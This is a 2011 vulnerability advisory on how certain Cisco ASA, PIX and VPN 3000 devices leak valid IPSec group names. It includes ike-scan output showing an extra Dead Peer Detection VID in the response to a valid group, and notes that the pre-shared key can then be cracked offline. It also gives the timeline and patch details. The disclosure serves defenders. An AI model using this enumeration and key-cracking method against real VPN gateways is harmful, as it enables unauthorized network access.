Cisco IPSec VPN Implementation Group Name Enumeration

Summary – 22.03.2011

Name: Cisco IPSec VPN Implementation Group Name Enumeration
Reference: NGS00014
Discoverer: Gavin Jones
Vendor: Cisco
Vendor Reference: CSCei51783, CSCtj96108 Systems Affected: ASA 5500 Series Adaptive Security Appliances -Cisco PIX 500 Series Security Appliances -Cisco VPN 3000 Series Concentrators (models 3005, 3015, 3020, 3030, 3060, and 3080)
Risk: Low
Status: Published

TimeLine

Discovered: 20 March 2009
Released:  8 November 2010
Approved:  8 November 2010
Reported:  8 November 2010
Fixed:  1 December 2010
Published: 22 March 2011

Description

Due to the device(s) returning differing responses to IKE requests it is possible to enumerate valid group names from the VPN device(s).  With the correct group name the pre-shared key can then be captured and a brute-force attack carried out off-line.

Technical Details

This output shows an aggressive query against the device specifying an invalid group:

Starting ike-scan 1.9 with 1 hosts
(http://www.nta-monitor.com/tools/ike-scan/)

10.1.0.1   Aggressive Mode Handshake returned
     HDR=(CKY-R=d508a1efacad8015)
     SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=XAUTH LifeType=Seconds
LifeDuration=28800)
     KeyExchange(128 bytes)
     Nonce(20 bytes)
     ID(Type=ID_FQDN, Value=Pix.domain.com)
     Hash(20 bytes)
     VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
     VID=09002689dfd6b712 (XAUTH)
     VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
     VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)
 
Ending ike-scan 1.9: 1 hosts scanned in 0.031 seconds (32.62 hosts/sec).  1 returned handshake; 0 returned notify

The above request is then repeated with a valid group name and as can be seen the response is different:

Starting ike-scan 1.9 with 1 hosts
(http://www.nta-monitor.com/tools/ike-scan/)
10.1.0.1   Aggressive Mode Handshake returned
     HDR=(CKY-R=4fa4cf45d5039335)
     SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=XAUTH LifeType=Seconds
LifeDuration=28800)
     KeyExchange(128 bytes)
     Nonce(20 bytes)
     ID(Type=ID_FQDN, Value=Pix.domain.com)
     Hash(20 bytes)
     VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
     VID=09002689dfd6b712 (XAUTH)
     VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
     VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
     VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)

Ending ike-scan 1.9: 1 hosts scanned in 0.031 seconds (32.19 hosts/sec).  1 returned handshake; 0 returned notify

As can be seen above, the request with the valid group name has an additional field contained in the response:

VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

By checking the responses for this additional VID it is possible to enumerate the valid group name.

This has been replicated in testing against a number of PIX based devices and with the valid group name the PSK can then be collected and cracked using psk-crack.

Fix Information

Cisco has released a patch that addresses the issue. The announcement of this patch can be found here:

http://www.cisco.com/en/US/products/products_security_response09186a0080b5992c.html

Patches can be downloaded from Cisco’s online support portal at:

http://www.cisco.com

Call us before you need us.

Our experts will help you.

Get in touch